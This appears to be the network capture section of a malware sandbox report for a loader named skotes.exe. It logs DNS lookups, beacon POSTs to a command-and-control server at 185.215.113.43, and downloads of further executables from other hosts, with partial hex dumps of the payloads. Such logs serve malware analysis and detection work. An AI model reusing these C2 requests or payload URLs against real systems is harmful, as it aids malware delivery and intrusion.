Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216233015 CET	1.1.1.1	192.168.2.4	0x1d85	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216417074 CET	1.1.1.1	192.168.2.4	0x3608	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.216766119 CET	1.1.1.1	192.168.2.4	0x310	No error (0)	star-mini.c10r.facebook.com		157.240.252.35	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.230319977 CET	1.1.1.1	192.168.2.4	0xa002	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.230362892 CET	1.1.1.1	192.168.2.4	0x7a47	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.230362892 CET	1.1.1.1	192.168.2.4	0x7a47	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.230362892 CET	1.1.1.1	192.168.2.4	0x7a47	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.230362892 CET	1.1.1.1	192.168.2.4	0x7a47	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.231667995 CET	1.1.1.1	192.168.2.4	0x71ce	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Nov 5, 2024 18:47:09.247761011 CET	1.1.1.1	192.168.2.4	0x323e	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:09.247761011 CET	1.1.1.1	192.168.2.4	0x323e	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.247761011 CET	1.1.1.1	192.168.2.4	0x323e	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.247761011 CET	1.1.1.1	192.168.2.4	0x323e	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.247761011 CET	1.1.1.1	192.168.2.4	0x323e	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.248020887 CET	1.1.1.1	192.168.2.4	0xda9c	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.259948015 CET	1.1.1.1	192.168.2.4	0x1570	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.259948015 CET	1.1.1.1	192.168.2.4	0x1570	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.259948015 CET	1.1.1.1	192.168.2.4	0x1570	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.259948015 CET	1.1.1.1	192.168.2.4	0x1570	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.260400057 CET	1.1.1.1	192.168.2.4	0xdd8e	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:11.086536884 CET	1.1.1.1	192.168.2.4	0x2941	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49786	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:03.457326889 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:46:04.415158987 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49798	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:05.931911945 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 5, 2024 18:46:06.857815027 CET	646	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 63 37 0d 0a 20 3c 63 3e 31 30 30 34 31 34 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 36 64 39 37 34 34 34 66 62 66 35 65 61 61 34 39 35 63 34 39 23 31 30 30 34 31 35 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 31 35 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 34 31 35 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 [TRUNCATED] Data Ascii: 1c7 <c>1004149001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd6d97444fbf5eaa495c49#1004154001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1004155001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1004156001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1004157001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49804	31.41.244.11	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:06.873280048 CET	55	OUT	GET /files/freecam.exe HTTP/1.1 Host: 31.41.244.11
Nov 5, 2024 18:46:07.775578976 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: application/octet-stream Content-Length: 13504000 Last-Modified: Tue, 05 Nov 2024 16:50:43 GMT Connection: keep-alive ETag: "672a4ce3-ce0e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 60 cd 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 62 61 00 00 04 08 00 00 00 00 00 80 a6 06 00 00 10 00 00 00 60 c0 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 70 d1 00 00 04 00 00 d4 f4 ce 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 ca 00 10 04 00 00 00 c0 d0 00 50 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ca 00 fe bd 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`ba`@p@P o.textE`aba `.rdata^a^fa@@.data`XD@.idata@.reloc@B.symtab`B.rsrcPb@@
Nov 5, 2024 18:46:07.775618076 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 04 24 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 0c 24 c3 cc cc cc cc Data Ascii: $$$$,$4$<$ Go build ID: "0DAy58TLBYAx5JVjiNJZ/9Qqtl
Nov 5, 2024 18:46:07.775693893 CET	1236	IN	Data Raw: 47 63 42 7a 58 71 64 71 5f 5a 44 76 66 7a 39 2f 79 36 64 4e 73 35 71 36 47 50 56 44 31 47 49 78 46 35 4c 48 2f 76 66 59 44 43 51 56 70 30 45 57 66 66 51 5f 75 62 46 77 73 22 0a 20 ff cc cc cc cc cc cc cc cc cc 64 8b 0d 14 00 00 00 8b 89 00 00 00 Data Ascii: GcBzXqdq_ZDvfz9/y6dNs5q6GPVD1GIxF5LH/vfYDCQVp0EWffQ_ubFws" d;av &D$$D$D$yud;aD\$Hl$L1}11'9p9w)}!
Nov 5, 2024 18:46:07.775712013 CET	1236	IN	Data Raw: ae 85 06 00 87 cd 88 4c 03 0d 87 cd 8d 46 01 89 d3 39 d8 7d 2e 8b 35 3c d8 07 01 8b 3d 38 d8 07 01 39 f0 73 30 89 c6 c1 e0 04 c6 44 07 0c 01 8b 3d 3c d8 07 01 89 da 8b 1d 38 d8 07 01 39 fe 72 c3 eb 09 8b 74 24 40 e9 89 fb ff ff 89 f0 89 f9 e8 5d Data Ascii: LF9}.5<=89s0D=<89rt$@]VX/=pd;a;X $9D$@Q!m
Nov 5, 2024 18:46:07.775724888 CET	1236	IN	Data Raw: 8d 05 81 c8 b2 00 e8 53 80 06 00 89 ef 8d 05 22 6d 0a 01 e8 46 80 06 00 89 d0 c7 44 0b 14 04 00 00 00 66 c7 44 0b 1c 00 00 8b 15 d0 66 0a 01 85 d2 75 16 8d 15 2a d8 b2 00 89 54 0b 10 8d 15 23 6d 0a 01 89 54 0b 18 eb 1c 89 c7 8d 05 2a d8 b2 00 e8 Data Ascii: S"mFDfDfuT#mT\|$8#mD$fD,fuT $mT(\|$T\|$4$mD4fD<fuT0%mT8\|$Ln\|$
Nov 5, 2024 18:46:07.775737047 CET	1236	IN	Data Raw: 89 44 24 08 c3 cc cc cc cc cc 8b 44 24 04 8b 00 89 44 24 08 c3 cc cc cc cc cc 8b 44 24 04 0f b6 00 88 44 24 08 c3 cc cc cc cc 64 8b 0d 14 00 00 00 8b 89 00 00 00 00 3b 61 08 76 1d 83 ec 08 8b 44 24 0c 84 00 89 04 24 e8 cd 04 00 00 8b 44 24 04 89 Data Ascii: D$D$D$D$D$d;avD$$D$D$gd;avD$$mD$D$fd;avD$$D$D$efd
Nov 5, 2024 18:46:07.775748968 CET	848	IN	Data Raw: cc cc cc cc cc cc 64 8b 0d 14 00 00 00 8b 89 00 00 00 00 3b 61 08 76 1c 83 ec 08 8d 05 c0 89 a9 00 89 04 24 8d 05 44 c8 c2 00 89 44 24 04 e8 33 8a 03 00 90 e8 6d 62 06 00 eb cb cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 00 89 44 24 08 c3 cc Data Ascii: d;av$DD$3mbD$D$D$D$\$D$L$D${
Nov 5, 2024 18:46:07.775830984 CET	1236	IN	Data Raw: 04 8b 54 24 04 8b 1a 8b 52 04 39 cb 0f 94 c1 39 c2 0f 94 c0 21 c8 88 44 24 0c c3 e8 36 5f 06 00 eb c4 cc cc cc cc 8b 44 24 04 0f bc c0 74 05 89 44 24 0c c3 8b 44 24 08 0f bc c0 74 08 83 c0 20 89 44 24 0c c3 c7 44 24 0c 40 00 00 00 c3 cc cc cc cc Data Ascii: T$R99!D$6_D$tD$D$t D$D$@D$u D$D$uD$d;a$D$\D$l]L*$
Nov 5, 2024 18:46:07.775841951 CET	1236	IN	Data Raw: 10 8b 6c 24 30 8b 54 24 34 31 ff 31 ff 89 7c 24 1c 31 ff eb 22 8d 5f 01 8b 74 24 1c 69 f6 93 01 00 01 0f b6 7c 3d 00 01 fe 89 df 89 74 24 1c 8b 5c 24 38 8b 74 24 10 39 f9 7e 09 39 fa 77 d6 e9 45 01 00 00 89 44 24 18 8b 7c 24 1c 39 c7 75 5f 39 d1 Data Ascii: l$0T$411\|$1"_t$i\|=t$\$8t$9~9wED$\|$9u_9,,$\$L$JD$uD$L$<T$4\$8l$0t$\|$ D$@,L$T$4\$8t$9L$i\\|$<)9T)T$r9u\
Nov 5, 2024 18:46:07.775852919 CET	424	IN	Data Raw: 44 24 0c 89 44 24 1c 83 c4 10 c3 e8 9e 55 06 00 eb bc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 10 8d 42 04 8b 00 8b 4c 24 14 89 0c 24 8b 4c 24 18 89 4c 24 04 89 44 24 08 e8 30 68 06 00 8b 44 24 0c 89 44 24 1c 83 c4 10 c3 cc cc cc cc 64 8b 0d 14 Data Ascii: D$D$UBL$$L$L$D$0hD$D$d;av,D$@$L$L$D$\D$D$Ud;aD$W.u.u{[d@
Nov 5, 2024 18:46:07.780635118 CET	1236	IN	Data Raw: 0f 8b 87 00 00 00 66 0f 2e c0 75 02 7b 5b 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 8b 88 94 00 00 00 8b 90 98 00 00 00 89 90 94 00 00 00 89 cb c1 e1 11 31 d9 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 98 00 00 00 8d 04 1a 8b 4c Data Ascii: f.u{[d@1111L$15ivD$$D$D$D$EfD$D$D$5ivD$]S(d;av<D$$L$L$D$L$$L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49845	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:15.209656000 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004149001&unit=246122658369
Nov 5, 2024 18:46:16.115005016 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49851	185.215.113.16	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:16.123564959 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 18:46:17.025003910 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:16 GMT Content-Type: application/octet-stream Content-Length: 3147776 Last-Modified: Tue, 05 Nov 2024 16:57:50 GMT Connection: keep-alive ETag: "672a4e8e-300800" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 10 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 30 00 00 04 00 00 a8 c2 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@@00@Th@ @.rsrc@@.idata @uxuaewjgPL@tafnuvmn0/@.taggant00"/@
Nov 5, 2024 18:46:17.025016069 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:17.025027990 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:17.025099993 CET	636	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:17.025109053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 1e 80 24 9d d3 e3 db 3a 07 79 56 30 85 6e 7c 6f ad e5 3b 4e a1 db 52 5e 18 e8 e7 ed c1 42 3b 32 85 6e f7 ab 8b 7a e9 a2 15 dd 67 a2 15 dd 67 ab 5c e4 af 25 33 62 7e 34 1e 66 38 71 Data Ascii: $:yV0n\|o;NR^B;2nzgg\%3b~4f8qV1e~gmGvgwv@O5oV1v_{nEKN_{ne4Kv5n l#N&J~2#NEFm2{g."@a~vwv<AO
Nov 5, 2024 18:46:17.025120020 CET	1236	IN	Data Raw: 1b b1 8e 6c 7e ea 00 9d f7 f9 83 6e f7 32 00 74 f7 be 87 e5 b4 a7 c0 6f e1 32 85 6e 77 b1 79 49 d2 96 a1 5e 62 66 a1 1e 7e 66 a1 5a 62 66 a1 f6 7e 66 a1 66 62 66 a1 2a 7e 66 a1 62 62 66 a1 3e 7e 26 a1 e5 3b 4e ad 86 1a 4e 85 6e 74 ee a9 e1 b7 be Data Ascii: l~n2to2nwyI^bf~fZbf~ffbf*~fbbf>~&;NNnt#N2#N5B~t%2#N#NgBcBX,n~d}{4_unl~fnB;Ncn%^-n~fea26n}fF5n3@5nBt
Nov 5, 2024 18:46:17.025125027 CET	1236	IN	Data Raw: 17 33 85 6e f7 ec c1 42 0f 32 43 21 1b 46 85 a7 3b 4e b1 6e f7 32 85 a7 3b 4e 99 6e f7 32 85 d9 7b 4e e8 6c f7 32 1e 21 1b 5a 5c 21 1b 2a 85 6e f7 32 b6 70 05 eb 5c 21 1b 72 85 6e f7 32 7e 5e e6 32 85 db 23 4e a1 5f 89 33 00 ac fb ab d9 42 1b aa Data Ascii: 3nB2C!F;Nn2;Nn2{Nl2!Z\!n2p\!rn2~^2#N_3BA,0nnN2nn6B2\!~n2\!&n2n;d2!Njmt;Nw:Nn2_zne2Nc\|f"u}BV2\!Rn2\!&n2ne2Nm2j5I
Nov 5, 2024 18:46:17.025130033 CET	1236	IN	Data Raw: 3b 21 9c e6 3b 5c 83 5f 89 6e 90 66 7f 6e 93 67 74 f0 9d 35 a6 bf 37 6c a9 ab f1 42 fb 70 18 31 1b a9 e9 42 e7 b1 e1 42 3f 2d f1 30 7c 6e a1 56 f6 e2 1e a3 06 eb 18 f1 1b 2e 18 09 1b 6a 15 dd 67 a2 15 dd 67 a2 15 dd 67 25 33 61 fd aa 81 58 36 7b Data Ascii: ;!;\_nfngt57lBp1BB?-0\|nV.jggg%3aX6{X3[KNN"9$!GJ~^q(;N;~xYn8n2~.Na25ZNYvct!J1BY=UUFj3@=:KN}N8m3W}BZF
Nov 5, 2024 18:46:17.025135994 CET	1236	IN	Data Raw: f5 ab 43 e2 c3 56 6a 09 1b 22 1a 21 1b 62 1e 21 1b 26 1a 21 1b ba 1e 21 1b 2a 1a 21 1b 76 1e 21 1b 2e 1a 21 1b 42 1e 61 1b ab f1 42 ef 0a 41 50 f7 32 00 a1 13 af 45 f1 ff b3 d9 42 ff b2 85 6e f7 ab f1 42 e7 ec c1 42 03 32 43 21 1b 7a 85 be 02 b2 Data Ascii: CVj"!b!&!!!v!.!BaBAP2EBnBB2C!zA2SRs!p:NlK+C!z;NKN2n;Nn2;N;N/nz<a2ns!*l2}}O?v`Nm2b2+N{BB%3Qm~Z!+N5%
Nov 5, 2024 18:46:17.025146961 CET	1236	IN	Data Raw: 06 19 16 dd 67 a2 15 dd 67 a2 15 dd 67 a2 15 dd 67 ec 81 56 07 71 ce 94 4a 3d 87 96 7e e8 be 94 dc 30 1e 9b 74 3b 9e fc ea ed 85 3e 07 42 b5 a7 37 2e b5 3e 07 42 00 ad ff b1 47 75 49 09 1f ac 7c 96 a1 4e 62 5e b0 db 3b 4e 95 35 b5 b4 9d e5 b4 4b Data Ascii: ggggVqJ=~0t;>B7.>BGuI\|Nb^;N5KpSNBKgc~t5BBChggBm~fRT5lv;NKoBBu[<Bm~fRBm~fR93!^%B%3ml;N
Nov 5, 2024 18:46:17.030046940 CET	1236	IN	Data Raw: 49 09 01 e8 ff 32 94 e2 76 34 85 6e 7d f3 be 7d 75 3b 85 6c f7 32 94 da 46 34 85 6e f5 66 a1 22 26 35 f3 5a 29 35 d3 66 74 ee 99 e1 b7 25 01 6b e3 32 85 e5 b8 ab 43 84 24 34 85 6e 66 ab 5f e2 ce 2a f0 c5 dc f6 1e 19 1b 72 94 b0 3b 4e cd d9 23 4e Data Ascii: I2v4n}}u;l2F4nf"&5Z)5ft%k2C$4nf_*r;N#N#N{g\%3!zm2pD@m25eJm;N%2ebHm2VggBm~fR]5lmDBaEgggBm~RB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49877	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:22.299902916 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004154001&unit=246122658369
